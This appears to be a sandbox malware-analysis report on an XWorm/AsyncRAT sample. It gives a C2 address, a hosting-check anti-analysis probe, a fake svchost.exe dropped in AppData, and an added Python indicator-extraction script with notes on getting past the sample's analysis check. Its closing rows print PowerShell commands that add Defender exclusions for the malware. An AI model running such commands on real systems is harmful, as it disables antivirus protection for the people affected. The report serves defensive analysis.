Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49788 -> 45.141.26.134:7000
Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.141.26.134:7000 -> 192.168.2.8:49788
Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 208.95.112.1 80
Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 45.141.26.134 7000
Source: Malware configuration extractor | URLs: 45.141.26.134
Source: Yara match | File source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.8:49788 -> 45.141.26.134:7000
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: SPECTRAIPSpectraIPBVNL
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: powershell.exe, 00000010.00000002.2314732137.000001A6FE9CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
                Source: powershell.exe, 00000010.00000002.2316272859.000001A6FEA1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microso
                Source: file.exe, 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, svchost.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
                Source: powershell.exe, 00000006.00000002.1778239786.0000024C4D691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900848123.00000291C94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2066095694.0000029CC05EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000006.00000002.1750312345.0000024C3D849000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B96A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB07A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1750312345.0000024C3D621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B9481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB0581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6131000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000006.00000002.1750312345.0000024C3D849000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B96A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB07A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000009.00000002.1922046061.00000291D1ECE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
                Source: powershell.exe, 0000000E.00000002.2092526125.0000029CC8C24000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
                Source: powershell.exe, 00000006.00000002.1750312345.0000024C3D621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B9481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB0581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6131000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000009.00000002.1920456209.00000291D19F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.micros
                Source: powershell.exe, 00000006.00000002.1778239786.0000024C4D691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900848123.00000291C94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2066095694.0000029CC05EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
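                The rows above pin down the two things a responder wants from this section: the hard-coded C2 endpoint (45.141.26.134:7000, named by the configuration extractor and hit repeatedly with no preceding DNS query) and the anti-analysis probe (a GET to http://ip-api.com/line/?fields=hosting, the hosting-provider lookup the sample uses to recognise analysis infrastructure; the port-80 connection to 208.95.112.1 belongs to that probe, not to the C2). The script below is an added example, not code from Joe Sandbox or from the sample: it pulls those indicators out of rows written in the format used here (REPORT_LINES is a constructed copy of this section's rows, with ' | ' assumed as the column separator) and mirrors how the sample reads the probe's answer. The ip-api.com /line/ response format (one field per line, the hosting boolean rendered as the literal true or false) is an assumption about the service, not something this report shows.

```python
"""Network-row triage for a sandbox report.

Added example: not part of Joe Sandbox or of the sample. REPORT_LINES is a
constructed copy of this section's rows, with ' | ' as the column separator.
"""
import re
from collections import Counter

# Constructed sample rows (one string per report row).
REPORT_LINES = [
    r"Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 208.95.112.1 80",
    r"Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 45.141.26.134 7000",
    "Source: Malware configuration extractor | URLs: 45.141.26.134",
    "Source: global traffic | TCP traffic: 192.168.2.8:49788 -> 45.141.26.134:7000",
    "Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; "
    "Host: ip-api.com; Connection: Keep-Alive",
    "Source: unknown | DNS query: name: ip-api.com",
] + ["Source: unknown | TCP traffic detected without corresponding DNS query: 45.141.26.134"] * 15

CONNECT_RE = re.compile(r"Network Connect: (\d+\.\d+\.\d+\.\d+) (\d+)")
NO_DNS_RE = re.compile(r"without corresponding DNS query: (\d+\.\d+\.\d+\.\d+)")
HTTP_RE = re.compile(r"HTTP traffic detected: (\w+) (\S+) HTTP/1\.[01]; Host: ([^;\s]+)")
CONFIG_RE = re.compile(r"Malware configuration extractor \| URLs: (\S+)")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Image names that only belong in the system directories (this example's own list).
SYSTEM_IMAGES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe"}


def source_of(line):
    """Return the 'Source:' column of a report row."""
    head = line.split(" | ", 1)[0].strip()
    return head[len("Source: "):] if head.startswith("Source: ") else head


def extract_iocs(lines):
    """Collect C2 endpoints, no-DNS hit counts, the hosting probe and masquerading sources.

    A destination is treated as C2 when the configuration extractor names it, or when a
    process outside the system directories connects to it and no DNS query preceded
    the connection (a literal IP baked into the binary rather than a resolved name).
    """
    connects, no_dns, config_ips, probes = [], Counter(), set(), []
    for line in lines:
        if m := CONNECT_RE.search(line):
            connects.append((source_of(line), m.group(1), int(m.group(2))))
        elif m := NO_DNS_RE.search(line):
            no_dns[m.group(1)] += 1
        elif m := HTTP_RE.search(line):
            probes.append((m.group(1), m.group(3), m.group(2)))   # (method, host, path)
        elif m := CONFIG_RE.search(line):
            config_ips.add(m.group(1))

    c2, masquerading = set(), set()
    for src, ip, port in connects:
        from_user_dir = not src.lower().startswith(SYSTEM_DIRS)
        if ip in config_ips or (ip in no_dns and from_user_dir):
            c2.add((ip, port))
        # A system image name opening sockets from a user-writable path is its own finding.
        if src.rsplit("\\", 1)[-1].lower() in SYSTEM_IMAGES and from_user_dir:
            masquerading.add(src)
    return {
        "c2": sorted(c2),
        "no_dns_hits": dict(no_dns),
        "hosting_probe": any(host == "ip-api.com" and "fields=hosting" in path
                             for _method, host, path in probes),
        "masquerading_sources": sorted(masquerading),
    }


def hosting_check_says_sandbox(body):
    """Mirror the sample's reading of the ip-api.com answer.

    Assumption (not shown in the report): the /line/ endpoint returns one field per
    line and renders the boolean 'hosting' field as the literal 'true' or 'false'.
    'true' means the egress IP belongs to a hosting/colocation range, which is what
    the sample takes as a sign of an analysis box.
    """
    lines = body.strip().splitlines()
    return bool(lines) and lines[0].strip().lower() == "true"
```

                The hosting answer is the sample's gate, so an analysis VM whose egress IP answers false (or a transparent rewrite of that response) keeps the sample on the path that reaches 45.141.26.134, while a true answer is the outcome the sample presumably treats as "being analysed". The no_dns_hits counter is the same signal Suricata raised in this run: repeated TCP to a literal IP with no name resolution in front of it.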

                Operating System Destruction

                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process information set: 01 00 00 00

                System Summary

                Source: 0.2.file.exe.2cb6568.2.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
                Source: 0.2.file.exe.2ca5528.1.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
                Source: 0.2.file.exe.2ca5528.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: 0.2.file.exe.2cb6568.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
                Source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
                Source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
                Source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
                Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Detects AsyncRAT; Author: ditekSHen
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FFB4AD31719
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FFB4AD360C6
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FFB4AD31290
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FFB4AD36E72
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FFB4AD3E5B9
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FFB4AD35BC9
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FFB4AD320F1
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FFB4AD310A5
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 5_2_00007FFB4AD1172B
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 5_2_00007FFB4AD11038
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFB4AD4248D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFB4AE130E9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFB4AD3248D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFB4AE030E9
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 20_2_00007FFB4AD31719
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 20_2_00007FFB4AD31038
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 20_2_00007FFB4AD320F1
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 23_2_00007FFB4AD1172B
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 23_2_00007FFB4AD11038
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 25_2_00007FFB4AD01719
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 25_2_00007FFB4AD01038
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 25_2_00007FFB4AD020F1
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 26_2_00007FFB4AD31719
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 26_2_00007FFB4AD31038
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 26_2_00007FFB4AD320F1
                Source: file.exe, 00000000.00000000.1655985395.000000000089E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFullOption_2.1Xenos.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesvchos.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.1676789335.000000001B840000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesvchos.exe4 vs file.exe
                Source: file.exe | Binary or memory string: OriginalFilenameFullOption_2.1Xenos.exe4 vs file.exe
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.file.exe.2cb6568.2.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 0.2.file.exe.2ca5528.1.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 0.2.file.exe.2ca5528.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.file.exe.2cb6568.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: svchost.exe.0.dr, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: svchost.exe.0.dr, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: svchost.exe.0.dr, ySlzXr7X0ZHHczxmHVHsQU3CKETS2EyNvAKNuVj36WghZI4M0NfC1ZeRuCpP2opoN9e3ovh1.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@28/24@1/2
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Mutant created: NULL
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Mutant created: \Sessions\1\BaseNamedObjects\RXodfPcgOmzjDIlhm
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3596:120:WilError_03
                Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\8Yv9IxtuMbRqy6c8f
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\5tjosB4RVZjT5QLU
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4004:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
                Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe | ReversingLabs: Detection: 71%
                Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Process created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
